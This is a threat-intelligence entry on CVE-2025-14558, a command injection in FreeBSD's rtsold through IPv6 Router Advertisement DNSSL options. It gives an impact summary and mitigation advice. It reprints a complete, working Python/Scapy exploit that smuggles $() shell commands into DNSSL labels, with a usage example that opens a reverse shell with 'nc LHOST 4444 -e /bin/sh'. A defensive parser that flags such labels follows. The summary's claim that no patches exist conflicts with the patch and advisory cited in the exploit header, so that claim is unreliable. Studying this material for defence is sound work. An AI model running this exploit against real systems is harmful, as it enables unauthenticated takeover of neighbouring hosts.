FreeBSD rtsold 15.x - Remote Code Execution via DNSSL
AI Analysis
Technical Summary
The vulnerability targets the rtsold daemon in FreeBSD 15.x, which is responsible for router solicitation and managing IPv6 router advertisements. Specifically, the flaw is triggered via the DNSSL (DNS Search List) option processing, where malformed or maliciously crafted DNSSL data can lead to remote code execution. This occurs because rtsold improperly handles or parses the DNSSL option, allowing an attacker to inject and execute arbitrary code on the affected system without requiring authentication or user interaction. The exploit leverages network-level access, typically requiring the attacker to be on the same local network or able to send packets to the vulnerable host. The availability of a Python-based exploit script lowers the barrier for attackers to weaponize this vulnerability. Although no patches have been released yet, the critical nature of this flaw demands immediate attention. The vulnerability impacts the confidentiality, integrity, and availability of affected systems, potentially allowing attackers to take full control, disrupt services, or pivot within networks.
Potential Impact
For European organizations, the impact is significant, especially for those using FreeBSD 15.x in network infrastructure, embedded devices, or critical systems. Successful exploitation can lead to full system compromise, data breaches, service disruption, and lateral movement within corporate networks. This can affect sectors such as telecommunications, government, finance, and critical infrastructure operators who rely on FreeBSD for stability and security. The lack of authentication and ease of exploitation increase the risk of widespread attacks once exploit code becomes widely used. Additionally, the potential for remote code execution can facilitate ransomware deployment or espionage activities, posing severe operational and reputational risks.
Mitigation Recommendations
Since no official patches are currently available, organizations should immediately implement network-level mitigations such as filtering or blocking unsolicited IPv6 router solicitation packets from untrusted sources. Disable or restrict the use of rtsold where feasible, especially on systems exposed to untrusted networks. Employ network segmentation to limit exposure of vulnerable FreeBSD hosts. Monitor network traffic for suspicious DNSSL option packets and anomalous rtsold activity. Consider deploying intrusion detection/prevention systems with custom signatures targeting this exploit. Maintain up-to-date backups and prepare incident response plans for potential exploitation. Stay alert for official patches or advisories from FreeBSD and apply them promptly once released. Engage with FreeBSD community channels for updates and mitigation guidance.
Affected Countries
Germany, France, United Kingdom, Netherlands, Sweden, Finland, Norway, Denmark
Indicators of Compromise
- exploit-code:

```python
# Exploit Title: FreeBSD rtsold 15.x - Remote Code Execution via DNSSL
# Date: 2025-12-16
# Exploit Author: Lukas Johannes Möller
# Vendor Homepage: https://www.freebsd.org/
# Version: FreeBSD 13.x, 14.x, 15.x (before 2025-12-16 patches)
# Tested on: FreeBSD 14.1-RELEASE
# CVE: CVE-2025-14558
#
# Description:
# rtsold(8) processes IPv6 Router Advertisement DNSSL options without
# validating domain names for shell metacharacters. The decoded domains
# are passed to resolvconf(8), a shell script that uses unquoted variable
# expansion, enabling command injection via $() substitution.
#
# Requirements:
# - Layer 2 adjacency to target
# - Target running rtsold with ACCEPT_RTADV enabled
# - Root privileges (raw socket for sending RA)
# - Python 3 + Scapy
#
# References:
# https://security.FreeBSD.org/advisories/FreeBSD-SA-25:12.rtsold.asc
# https://github.com/JohannesLks/CVE-2025-14558

import argparse
import struct
import sys
import time

try:
    from scapy.all import (
        Ether, IPv6, ICMPv6ND_RA, ICMPv6NDOptPrefixInfo,
        ICMPv6NDOptSrcLLAddr, Raw, get_if_hwaddr, sendp
    )
except ImportError:
    sys.exit("[!] Scapy required: pip install scapy")


def encode_domain(name):
    """Encode domain in DNS wire format (RFC 1035)."""
    result = b""
    for label in name.split("."):
        if label:
            data = label.encode()
            result += bytes([len(data)]) + data
    return result + b"\x00"


def encode_payload(cmd):
    """Encode payload as DNS label with $() wrapper for command substitution."""
    payload = f"$({cmd})".encode()
    if len(payload) > 63:
        # Split long payloads across labels (dots inserted on decode)
        result = b""
        while payload:
            chunk = payload[:63]
            payload = payload[63:]
            result += bytes([len(chunk)]) + chunk
        return result + b"\x00"
    return bytes([len(payload)]) + payload + b"\x00"


def build_dnssl(cmd, lifetime=0xFFFFFFFF):
    """Build DNSSL option (RFC 6106) with injected command."""
    data = encode_domain("x.local") + encode_payload(cmd)
    # Pad to 8-byte boundary
    pad = (8 - (len(data) + 8) % 8) % 8
    data += b"\x00" * pad
    # Type=31 (DNSSL), Length in 8-octet units
    length = (8 + len(data)) // 8
    return struct.pack(">BBH", 31, length, 0) + struct.pack(">I", lifetime) + data


def build_ra(mac, payload):
    """Build Router Advertisement with malicious DNSSL."""
    return (
        Ether(src=mac, dst="33:33:00:00:00:01") /
        IPv6(src="fe80::1", dst="ff02::1", hlim=255) /
        ICMPv6ND_RA(chlim=64, M=0, O=1, routerlifetime=1800) /
        ICMPv6NDOptSrcLLAddr(lladdr=mac) /
        ICMPv6NDOptPrefixInfo(
            prefixlen=64, L=1, A=1,
            validlifetime=2592000, preferredlifetime=604800,
            prefix="2001:db8::"
        ) /
        Raw(load=build_dnssl(payload))
    )


def main():
    p = argparse.ArgumentParser(
        description="CVE-2025-14558 - FreeBSD rtsold DNSSL Command Injection",
        epilog="Examples:\n"
               "  %(prog)s -i eth0\n"
               "  %(prog)s -i eth0 -p 'id>/tmp/pwned'\n"
               "  %(prog)s -i eth0 -p 'nc LHOST 4444 -e /bin/sh'",
        formatter_class=argparse.RawDescriptionHelpFormatter
    )
    p.add_argument("-i", "--interface", required=True, help="Network interface")
    p.add_argument("-p", "--payload", default="touch /tmp/pwned", help="Command to execute")
    p.add_argument("-c", "--count", type=int, default=3, help="Packets to send (default: 3)")
    args = p.parse_args()

    try:
        mac = get_if_hwaddr(args.interface)
    except Exception as e:
        sys.exit(f"[!] Interface error: {e}")

    print(f"[*] Interface: {args.interface} ({mac})")
    print(f"[*] Payload: {args.payload}")

    pkt = build_ra(mac, args.payload)
    for i in range(args.count):
        sendp(pkt, iface=args.interface, verbose=False)
        print(f"[+] Sent RA {i+1}/{args.count}")
        if i < args.count - 1:
            time.sleep(1)
    print("[+] Done")


if __name__ == "__main__":
    main()
```
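Added here as a defender's example, not part of the Exploit-DB script above or of FreeBSD's fix: a strict DNSSL option parser that a monitoring sensor (the "suspicious DNSSL option packets" the mitigation section asks for) or a hardened receiver could run to flag search-list labels that are not plain RFC 1123 hostnames before any name reaches a shell such as resolvconf(8). The option layout follows RFC 8106 (successor of the RFC 6106 the script cites); the two sample options are constructed inline.

```python
import re
import struct

# RFC 8106 DNSSL option: Type=31, Length (8-octet units), Reserved, Lifetime, then
# DNS wire-format names (RFC 1035 labels), zero-padded to the option length.
DNSSL_TYPE = 31
# RFC 1123 hostname label: letters, digits, hyphen; 1-63 octets; no edge hyphen.
LDH_LABEL = re.compile(rb"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


def parse_dnssl(option):
    """Return (lifetime, names) from a raw DNSSL option; raises ValueError on malformed input."""
    if len(option) < 8 or len(option) % 8:
        raise ValueError("option length is not a multiple of 8 octets")
    typ, length, _reserved, lifetime = struct.unpack(">BBHI", option[:8])
    if typ != DNSSL_TYPE or length * 8 != len(option):
        raise ValueError("type or length field does not match the data")
    names, labels, i = [], [], 8
    while i < len(option):
        n = option[i]
        i += 1
        if n == 0:  # end of a name; trailing zeros are the option padding
            if labels:
                names.append(labels)
                labels = []
            continue
        if n > 63 or i + n > len(option):  # also rejects 0xC0 compression pointers
            raise ValueError("bad label length")
        labels.append(option[i:i + n])
        i += n
    if labels:
        raise ValueError("unterminated domain name")
    return lifetime, names


def suspicious_labels(option):
    """Labels that are not plain LDH hostnames, e.g. ones carrying $() or other shell syntax."""
    _, names = parse_dnssl(option)
    return [lbl for name in names for lbl in name if not LDH_LABEL.match(lbl)]


def build_option(names, lifetime=3600):
    """Encode a DNSSL option; used here only to construct the sample inputs below."""
    body = b"".join(b"".join(bytes([len(lab)]) + lab.encode() for lab in n.split(".") if lab) + b"\x00"
                    for n in names)
    body += b"\x00" * (-(8 + len(body)) % 8)
    return struct.pack(">BBHI", DNSSL_TYPE, (8 + len(body)) // 8, 0, lifetime) + body


# Constructed samples: a benign search list and one whose second name is a shell substitution.
BENIGN = build_option(["corp.example", "lab.example"])
INJECTED = build_option(["x.local", "$(touch /tmp/marker)"])
```

A receiver applying this check would drop the whole option on any flagged label; a sensor would alert on it together with the source link-layer address of the advertisement.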
Technical Details
- EDB ID: 52463
- Has exploit code: true
- Code language: Python
Threat ID: 694d89022ffa995e0c012b37
Added to database: 12/25/2025, 6:57:06 PM
Last enriched: 1/17/2026, 8:04:09 AM
Last updated: 2/7/2026, 5:36:24 AM